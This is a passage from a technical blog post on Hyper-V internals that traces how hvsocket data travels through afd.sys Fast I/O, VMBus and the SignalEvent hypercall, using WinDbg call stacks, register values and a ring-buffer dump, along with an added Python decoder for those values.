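<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Decoding 0x1201F this way gives operation 7 (AFD_SEND) with method 3, and 0x12017 gives operation 5 (AFD_RECV). The method value is the security-relevant detail: METHOD_NEITHER means the I/O manager does neither buffer copying nor MDL probing, so the pointers inside AFD_SEND_INFO and the WSABUF array it references are validated only by afd.sys itself, which is the first place to look when auditing this path in a kernel debugger.</span></div>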
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, 00DBF45C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 1201F</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DBF44C</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">However, we will not reach the standard handler afd!AfdDispatchDeviceControl; instead this control code is processed by afd!AfdFastIoDeviceControl. The corresponding handler is registered at driver initialization:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">objDrv->FastIoDispatch = &AfdFastIoDispatch</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvSignalEvent</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!BusChSendInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbkmcl!KmclSendSignal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PipeWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlConnectProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopXxxControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wow64cpu!CpupSyscallStub</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">wow64cpu!DeviceIoctlFileFaul</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvpHypercallRoutine has the following parameters:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WINDBG>r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=000000000001005d – hypercall code</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=000000000001000a – CONNECTION_ID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8 = 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As in the study of the data transmission process of the Hyper-V Data Exchange component (</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://hvinternals.blogspot.com/2015/10/hyper-v-internals.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, section Integration Services - Data Exchange), when data is transferred via the shared buffer, the signal to read it is the WinHvSignalEvent call. The shared buffer was allocated earlier and is an area of memory that both the guest OS and the root OS can read and write. To see this area, set a breakpoint on vmbusr!PkGetReceiveBuffer and look at the buffer whose pointer is located at rcx+18h. The buffer is rather large: in 2012 R2, 10 physical pages were allocated for it, that is 40 KB.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc ffffbf01`7c9a9000 L1000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9a9000 00000028 00000000 00000001 00000000 (...............</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9a9010 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">……………………………………………………………………………………………………………….</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa000 00020006 00000004 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa010 00000001 00000008 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">74736554 74736554 ........TestTest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffbf01`7c9aa020 00000000 00000000 00000000 00000000 ................</span></div>
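Decoding the debugger output above, as an added example that is not code from the article: the register values seen at winhv!WinHvpHypercallRoutine are split into the TLFS hypercall-input fields and HV_CONNECTION_ID, and the `dc` dump of the shared ring buffer is parsed into ring header, packet descriptor, hvsocket pipe header and payload. The structure layouts are assumed from the public Hyper-V TLFS and the VMBus definitions in the Linux kernel headers (hv_ring_buffer, vmpacket_descriptor, vmpipe_proto_header), not from the article; the length checks show why a reader of a buffer shared with another partition must validate offset8, len8 and data_size before using them as offsets.

```python
# Added example (not from the article): decode the WinDbg output shown above. Layouts follow
# the public Hyper-V TLFS (hypercall input value, HV_CONNECTION_ID) and the VMBus structures
# declared in the Linux kernel headers (hv_ring_buffer, vmpacket_descriptor,
# vmpipe_proto_header); the Windows drivers are assumed to use the same wire layout.
import re
import struct
from collections import namedtuple

HV_CALL_SIGNAL_EVENT = 0x005D  # TLFS call code for HvCallSignalEvent


def decode_hypercall_input(rcx: int) -> dict:
    """Split the 64-bit hypercall input value (rcx) into its TLFS bit fields."""
    return {
        "call_code": rcx & 0xFFFF,            # bits 15:0
        "fast": (rcx >> 16) & 1,              # bit 16: parameters passed in registers
        "var_hdr_size": (rcx >> 17) & 0x3FF,  # bits 26:17
        "rep_count": (rcx >> 32) & 0xFFF,     # bits 43:32
        "rep_start": (rcx >> 48) & 0xFFF,     # bits 59:48
    }


def decode_connection_id(rdx: int) -> int:
    """HV_CONNECTION_ID: Id is the low 24 bits, the top 8 bits are reserved."""
    return rdx & 0x00FFFFFF


PAGE_SIZE = 0x1000        # ring control header occupies the first page, data follows it
VM_PKT_DATA_INBAND = 6    # vmpacket_descriptor.type for in-band data packets
VMPIPE_PKT_TYPE_DATA = 1  # vmpipe_proto_header.pkt_type used by hvsocket for data
TRAILER_LEN = 8           # 64-bit "previous indices" value stored after every packet

# The `dc` output from the article; the part of the control page elided there is zero here.
WINDBG_DUMP = """
ffffbf01`7c9a9000 00000028 00000000 00000001 00000000 (...............
ffffbf01`7c9a9010 00000000 00000000 00000000 00000000 ................
ffffbf01`7c9aa000 00020006 00000004 00000000 00000000 ................
ffffbf01`7c9aa010 00000001 00000008 74736554 74736554 ........TestTest
ffffbf01`7c9aa020 00000000 00000000 00000000 00000000 ................
"""
DC_LINE = re.compile(r"^([0-9a-f]+)`([0-9a-f]{8})((?:\s+[0-9a-f]{8}){1,4})")

RingHeader = namedtuple("RingHeader", "write_index read_index interrupt_mask pending_send_sz")
InbandPacket = namedtuple(
    "InbandPacket", "pkt_type offset8 len8 flags trans_id pipe_type data_size payload")


def parse_dc_dump(text: str) -> bytearray:
    """Turn WinDbg `dc` output into a byte image relative to the first dumped address."""
    base, image = None, bytearray()
    for line in text.strip().splitlines():
        m = DC_LINE.match(line)
        if not m:
            continue
        addr = int(m.group(1) + m.group(2), 16)
        base = addr if base is None else base
        off = addr - base
        if len(image) < off:                     # range skipped in the dump
            image.extend(b"\0" * (off - len(image)))
        for word in m.group(3).split():          # each dword is little-endian
            image[off:off + 4] = struct.pack("<I", int(word, 16))
            off += 4
    return image


def decode_ring(image: bytes):
    """Decode the control page and the first packet of the data area.

    offset8, len8 and data_size come from the peer partition via shared memory, so each
    is checked against what the ring really holds before being used as an offset.
    """
    hdr = RingHeader(*struct.unpack_from("<4I", image, 0))
    data = image[PAGE_SIZE:]
    avail = hdr.write_index - hdr.read_index     # sample ring has not wrapped around
    pkt_type, offset8, len8, flags, trans_id = struct.unpack_from("<4HQ", data, hdr.read_index)
    hdr_len, total = offset8 * 8, len8 * 8       # descriptor length, whole packet length
    if pkt_type != VM_PKT_DATA_INBAND:
        raise ValueError(f"unexpected packet type {pkt_type}")
    if hdr_len < 16 or total < hdr_len + 8 or total + TRAILER_LEN > avail:
        raise ValueError("descriptor lengths inconsistent with ring indices")
    pipe_type, data_size = struct.unpack_from("<2I", data, hdr.read_index + hdr_len)
    if pipe_type != VMPIPE_PKT_TYPE_DATA or hdr_len + 8 + data_size > total:
        raise ValueError("pipe header claims more data than the packet carries")
    start = hdr.read_index + hdr_len + 8
    payload = bytes(data[start:start + data_size])
    return hdr, InbandPacket(pkt_type, offset8, len8, flags, trans_id, pipe_type, data_size, payload)


def packet_is_well_formed(image: bytes) -> bool:
    """True when decode_ring accepts the ring contents, False when a length check fails."""
    try:
        decode_ring(image)
        return True
    except (ValueError, struct.error):
        return False


if __name__ == "__main__":
    print(decode_hypercall_input(0x1005D), hex(decode_connection_id(0x1000A)))
    print(*decode_ring(parse_dc_dump(WINDBG_DUMP)), sep="\n")
```

For the dump on this page the decoded packet is 16 bytes of descriptor, 8 bytes of pipe header and 8 bytes of payload, and adding the 8-byte trailer gives exactly the write_index of 0x28.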
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 vmbusr!PkGetReceiveBuffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 vmbusr!PipeValidateAndGetReceiveBuffer</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 vmbusr!PipeForwardToValidPacket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 vmbusr!PipeTryReadOrPeekSingle</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!PipePeekMultiple</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!PipeProcessDeferredReadWrite</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!PipeProcessDeferredIosAndUnlock</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!PipeEvtChannelSignalArrived</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbkmclr!KmclpVmbusManualIsr</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 vmbusr!ParentRingInterruptDpc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!KiExecuteAllDpcs</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!KiRetireDpcList</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiIdleLoop</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the same procedure a work item is added to the queue:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NetioInsertWorkQueue</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!VmbusTlQueueEndpointAction+0x14e</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 hvsocket!VmbusTlDeliverDataIndications+0x6b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 hvsocket!VmbusTlXPartIndicateReceive+0x9b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 vmbusr!PipePeekMultiple+0xf3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 vmbusr!PipeProcessDeferredReadWrite+0x1b6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 vmbusr!PipeProcessDeferredIosAndUnlock+0x74</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!PipeEvtChannelSignalArrived+0x91</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 vmbkmclr!KmclpVmbusManualIsr+0x1d</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 vmbusr!ParentRingInterruptDpc+0x62</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a nt!KiExecuteAllDpcs+0x2b1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b nt!KiRetireDpcList+0x5df</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c nt!KiIdleLoop+0x5a</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The work item is then executed: the data is copied into the buffer allocated by hvsocket.sys and then passed to the application through the same Fast I/O path.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 hvsocket!VmbusTlIndicateReceive</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 hvsocket!VmbusTlConnectIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
